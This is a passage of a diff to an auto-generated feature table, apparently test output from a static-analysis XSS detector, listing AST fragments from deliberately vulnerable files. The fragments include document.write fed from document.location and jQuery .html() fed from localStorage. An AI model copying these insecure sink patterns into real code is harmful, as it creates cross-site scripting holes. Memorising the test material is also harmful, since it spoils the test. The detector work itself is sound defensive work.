myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:74 | exceptional return of $('myId ... '') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:74 | exceptional return of $('myId ... '') | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:29:7:29:12 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/stored-xss.js:29:7:29:12 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:29:7:29:12 | 'myId' | contextFunctionInterfaces | | @@ -15465,12 +109780,32 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:29:7:29:12 | 'myId' | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:29:7:29:12 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:29:7:29:12 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:15:29:18 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:15:29:18 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:15:29:18 | html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:15:29:18 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:15:29:18 | html | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:35 | '\\r\\nfoobar href indexOf " 1 $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:35 | '\\r\\n' + 'something' + '' | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:43 | '\\r\\n something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:43 | '\\r\\n' | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:50 | '\\r\\n' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:50 | '\\r\\n' | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:50 | '\\r\\n' | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:50 | '\\r\\n' | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:64 | '\\r\\n something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:64 | '\\r\\n' | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:73 | '\\r\\n' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:29:20:29:73 | '\\r\\n' | contextFunctionInterfaces | | @@ -15502,88 +109837,666 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:29:68:29:73 | '' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:29:68:29:73 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:29:68:29:73 | '' | stringConcatenatedWith | '\r\n' + 'something' -endpoint- | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:8 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:14 | document.write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:14 | document.write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:14 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:52 | documen ... eAt(0)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:52 | documen ... eAt(0)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:52 | documen ... eAt(0)) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:52 | exceptional return of documen ... eAt(0)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:52 | exceptional return of documen ... eAt(0)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:1:1:52 | exceptional return of documen ... eAt(0)) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:10:1:14 | write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:10:1:14 | write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:10:1:14 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:23 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:23 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:23 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:32 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:32 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:32 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:37 | documen ... on.href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:37 | documen ... on.href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:37 | documen ... on.href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:48 | documen ... rCodeAt | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:48 | documen ... rCodeAt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:48 | documen ... rCodeAt | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:51 | documen ... deAt(0) | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:51 | documen ... deAt(0) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:51 | documen ... deAt(0) | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:51 | documen ... deAt(0) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:51 | documen ... deAt(0) | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:51 | documen ... deAt(0) | receiverName | document | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:51 | exceptional return of documen ... deAt(0) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:51 | exceptional return of documen ... deAt(0) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:16:1:51 | exceptional return of documen ... deAt(0) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:25:1:32 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:25:1:32 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:25:1:32 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:34:1:37 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:34:1:37 | href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:34:1:37 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:39:1:48 | charCodeAt | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:39:1:48 | charCodeAt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:1:39:1:48 | charCodeAt | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:1:50:1:50 | 0 | CalleeFlexibleAccessPath | document.location.href.charCodeAt | | autogenerated/Xss/DomBasedXss/string-manipulations.js:1:50:1:50 | 0 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:1:50:1:50 | 0 | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:1:50:1:50 | 0 | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:1:50:1:50 | 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:8 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:14 | document.write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:14 | document.write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:14 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:33 | documen ... cation) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:33 | documen ... cation) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:33 | documen ... cation) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:33 | exceptional return of documen ... cation) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:33 | exceptional return of documen ... cation) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:1:3:33 | exceptional return of documen ... cation) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:10:3:14 | write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:10:3:14 | write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:10:3:14 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:16:3:23 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:16:3:23 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:16:3:23 | document | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:3:16:3:32 | document.location | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/string-manipulations.js:3:16:3:32 | document.location | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:3:16:3:32 | document.location | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:3:16:3:32 | document.location | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:3:16:3:32 | document.location | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:3:16:3:32 | document.location | receiverName | document | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:25:3:32 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:25:3:32 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:3:25:3:32 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:8 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:14 | document.write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:14 | document.write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:14 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:38 | documen ... n.href) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:38 | documen ... n.href) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:38 | documen ... n.href) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:38 | exceptional return of documen ... n.href) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:38 | exceptional return of documen ... n.href) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:1:4:38 | exceptional return of documen ... n.href) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:10:4:14 | write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:10:4:14 | write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:10:4:14 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:23 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:23 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:23 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:32 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:32 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:32 | document.location | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:37 | documen ... on.href | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:37 | documen ... on.href | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:37 | documen ... on.href | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:37 | documen ... on.href | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:37 | documen ... on.href | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:4:16:4:37 | documen ... on.href | receiverName | document | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:25:4:32 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:25:4:32 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:25:4:32 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:34:4:37 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:34:4:37 | href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:4:34:4:37 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:8 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:14 | document.write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:14 | document.write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:14 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:48 | documen ... ueOf()) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:48 | documen ... ueOf()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:48 | documen ... ueOf()) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:48 | exceptional return of documen ... ueOf()) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:48 | exceptional return of documen ... ueOf()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:1:5:48 | exceptional return of documen ... ueOf()) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:10:5:14 | write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:10:5:14 | write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:10:5:14 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:23 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:23 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:23 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:32 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:32 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:32 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:37 | documen ... on.href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:37 | documen ... on.href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:37 | documen ... on.href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:45 | documen ... valueOf | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:45 | documen ... valueOf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:45 | documen ... valueOf | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:47 | documen ... lueOf() | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:47 | documen ... lueOf() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:47 | documen ... lueOf() | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:47 | documen ... lueOf() | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:47 | documen ... lueOf() | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:47 | documen ... lueOf() | receiverName | document | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:47 | exceptional return of documen ... lueOf() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:47 | exceptional return of documen ... lueOf() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:16:5:47 | exceptional return of documen ... lueOf() | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:25:5:32 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:25:5:32 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:25:5:32 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:34:5:37 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:34:5:37 | href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:34:5:37 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:39:5:45 | valueOf | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:39:5:45 | valueOf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:5:39:5:45 | valueOf | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:8 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:14 | document.write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:14 | document.write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:14 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:44 | documen ... .sup()) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:44 | documen ... .sup()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:44 | documen ... .sup()) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:44 | exceptional return of documen ... .sup()) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:44 | exceptional return of documen ... .sup()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:1:6:44 | exceptional return of documen ... .sup()) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:10:6:14 | write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:10:6:14 | write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:10:6:14 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:23 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:23 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:23 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:32 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:32 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:32 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:37 | documen ... on.href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:37 | documen ... on.href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:37 | documen ... on.href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:41 | documen ... ref.sup | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:41 | documen ... ref.sup | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:41 | documen ... ref.sup | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:43 | documen ... f.sup() | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:43 | documen ... f.sup() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:43 | documen ... f.sup() | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:43 | documen ... f.sup() | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:43 | documen ... f.sup() | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:43 | documen ... f.sup() | receiverName | document | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:43 | exceptional return of documen ... f.sup() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:43 | exceptional return of documen ... f.sup() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:16:6:43 | exceptional return of documen ... f.sup() | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:25:6:32 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:25:6:32 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:25:6:32 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:34:6:37 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:34:6:37 | href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:34:6:37 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:39:6:41 | sup | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:39:6:41 | sup | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:6:39:6:41 | sup | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:8 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:14 | document.write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:14 | document.write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:14 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:52 | documen ... Case()) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:52 | documen ... Case()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:52 | documen ... Case()) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:52 | exceptional return of documen ... Case()) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:52 | exceptional return of documen ... Case()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:1:7:52 | exceptional return of documen ... Case()) | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:10:7:14 | write | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:10:7:14 | write | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:10:7:14 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:23 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:23 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:23 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:32 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:32 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:32 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:37 | documen ... on.href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:37 | documen ... on.href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:37 | documen ... on.href | fileImports | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:49 | documen ... perCase | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:49 | documen ... perCase | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:49 | documen ... perCase | fileImports | | | autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:51 | documen ... rCase() | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:51 | documen ... rCase() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/string-manipulations.js:7:16:7:51 | documen ... rCase() | 